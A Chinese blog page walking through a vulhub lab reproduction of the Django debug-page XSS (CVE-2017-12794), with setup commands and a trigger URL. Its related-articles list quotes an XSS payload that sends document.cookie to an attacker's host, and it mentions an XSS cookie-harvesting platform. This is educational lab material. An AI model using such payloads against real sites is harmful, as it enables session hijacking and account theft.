vulhub靶场漏洞复现——Django-XSS(CVE-2017-12794)

最新推荐文章于 2024-04-03 03:24:43 发布
最新推荐文章于 2024-04-03 03:24:43 发布
阅读量147 收藏 1
点赞数
分类专栏: vulhub刷题记录 文章标签: django xss python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/pigzlfa/article/details/133173343
版权

Django debug page XSS (CVE-2017-12794)
Django debug page XSS漏洞(CVE-2017-12794)分析

漏洞复现:
启动靶场环境:

docker-compose up -d
docker ps

在这里插入图片描述物理机访问8000端口,是一个404页面在这里插入图片描述创建一个用户

192.168.102.8:8000/create_user/?username=

在这里插入图片描述
刷新页面再次创建用户触发错误弹窗在这里插入图片描述

pigzlfa
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
django-xss-cleaner:Django XSS 清理器
07-07
这个类是你的 django 应用程序的 XSS 清理器。 这个类在“ ”地址中再次编写为Django版本的Php函数。 如果您想查看更多信息。 请点击
漏洞复现Django_debug page_XSS漏洞(CVE-2017-12794)
过期的秋刀鱼
11-05 586
1.11.5版本,修复了500页面中存在的一个XSS漏洞Django 1.11.5版本。再次刷新页面触发XSS
Vulhub漏洞系列:Django debug page XSS漏洞CVE-2017-12794)+ Django URL跳转漏洞CVE-2018-14574 )
weixin_43072923的博客
05-25 1884
Django debug page XSS漏洞CVE-2017-12794)+ Django URL跳转漏洞CVE-2018-14574 )00.前言01.简介02.漏洞描述03.漏洞复现 00.前言 这篇文章将对该漏洞进行简介并复现,同时简要说明Vulhub的使用方法,适合小白一起学习,大佬看看就好☺ 01.简介   Django是一个开放源代码的Web应用框架,由Python写成,采用了MTV的框架模式。   Django已经成为web开发者的首选框架,其主要目的是简便、快速的开发数据库驱动的网
14 - vulhub - Django debug page XSS漏洞CVE-2024-12794
最新发布
2301_82103140的博客
04-03 947
Python所有方向的技术点做的整理,形成各个领域的知识点汇总,它的用处就在于,你可以按照下面的知识点去找对应的学习资源,保证自己学得较为全面。
django/CVE-2017-12794XSS漏洞复现
weixin_56537388的博客
08-31 951
alert(1)
[ vulhub漏洞复现篇 ] Drupal XSS漏洞 (CVE-2019-6341)
qq_51577576的博客
02-21 1468
[ vulhub漏洞复现篇 ] Drupal XSS漏洞 (CVE-2019-6341) Drupal是使用PHP语言编写的开源内容管理框架(CMF),它由内容管理系统(CMS)和PHP开发框架(Framework)共同构成,在GPL2.0及更新协议下发布。Drupal在某些情况下,通过文件模块或者子系统上传恶意文件触发XSS漏洞
vulhub漏洞复现-jboss反序列化漏洞复现
weixin_45095113的博客
12-21 636
vulhub漏洞复现-jboss反序列化漏洞
django-rest-captcha
05-27
Django Rest验证码django-simple-captcha轻量级版本,可与django-rest-framework 。特征速度:使用cache代替数据库安全性:用于生成密钥和图像的联合方法。 (一个键不能生成很多图像) 简单:只需一个rest api...
django-db-connection-pool:Django 的持久数据库连接后端
05-30
django-db-connection-pool Django 的 MySQL & Oracle & PostgreSQL 连接池后端,基于 SQLAlchemy。快速开始使用pip安装所有引擎: $ pip install django-db-connection-pool[all] 或选择特定引擎: $ pip install ...
django-rest-framework-role-filters:django-rest-framework的简单角色过滤
02-05
django-rest-framework-role-filters:django-rest-framework的简单角色过滤
django-registration:Django-registration(redux)为Django网站提供用户注册功能
02-05
django-registration:Django-registration(redux)为Django网站提供用户注册功能
DRF跨域后端解决之django-cors-headers的使用
09-19
主要介绍了DRF跨域后端解决之django-cors-headers的使用,小编觉得挺不错的,现在分享给大家,也给大家做个参考。一起跟随小编过来看看吧
django-treebeard:Django的高效树实现
02-05
django-treebeard django-treebeard是一个库,可为Django Web Framework 2.2及更高版本实现有效的树实现。 它由GustavoPicón编写,并根据Apache License 2.0获得许可。状态产品特点django-treebeard是: 灵活:包括...
Django-XSS-Platform
04-27
使用Django打造属于自己的XSS平台地址环境python3库文件requestsdjango2pymysql说明前端采用开源Bootstarp模板,后端使用Django打造而成。功能邮件提醒Cookie活性保持多用户模式TODO添加多个Payload配置大部分配置...
django-code-generator:从Django模型生成代码以加快开发速度
05-19
要安装django-code-generator,请在终端中运行以下命令: $ sudo pip install django-code-generator 这是安装django-code-generator的首选方法,因为它将始终安装最新的稳定版本。 然后将其添加到您的INSTALLED...
django-rest-witchcraft:Django REST Framework与SQLAlchemy的集成
03-21
django-rest-witchcraft是Django REST Framework的扩展,增加了对SQLAlchemy的支持。它旨在提供与使用SQLAlchemy的Django REST Framework和Django ORM构建REST api相似的开发经验。 安装 pip install django-rest-...
黑客零基础第三章-Web漏洞利用实战-vulnhub:xss_and_mysql_file
ShadowBlade
08-23 3577
第七节内容讲述了XSS漏洞和原理,并在DVWA上进行了盗取cookie的实验。本节以实战的方式,结合vulnhub靶机xss_and_mysql_file让大家体验如何用XSS截获cookie进行进一步入侵。这个靶机会涉及到一点SQL注入的知识,但易于理解。后续章节会给大家着重讲解SQL注入。 <script>new Image().src="http://192.168.17.4/test.php?output="+document.cookie;</scr
vulhub学习文档-Drupal XSS漏洞
ploto_cs的博客
09-11 1046
Drupal XSS漏洞 一.漏洞介绍 (一)编号 CVE-2019-6341 (二)概述 Drupal诞生于2000年,是一个基于PHP语言编写的开发型CMF(内容管理框架)。在某些情况下,通过文件模块或者子系统上传恶意文件触发XSS漏洞。 (三)影响版本 在7.65之前的Drupal 7版本中; 8.6.13之前的Drupal 8.6版本; 8.5.14之前的Drupal 8.5版本。 (四)漏洞要求 <= Durpal 8.6.6 服务端开启评论配图或者攻击者拥有author以上权限的账号 被
graphene-django-extras:Graphene-Django的额外功能
02-04
石墨烯-Django-Extras 该软件包为graphene-django添加了一些额外的功能,以方便不使用Relay的graphql的使用: 允许对查询进行分页和过滤。 允许基于Mutations定义DjangoRestFramework序列化程序。 允许对查询和...
CVE-2017-12794
10-07
CVE-2017-12794是一个影响Django框架的安全漏洞。这个漏洞源于Django框架中的Technical 500 Template没有正确过滤用户提交的输入。攻击者可以利用这个漏洞在浏览器中执行任意的脚本代码,从而导致跨站脚本攻击(XSS...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值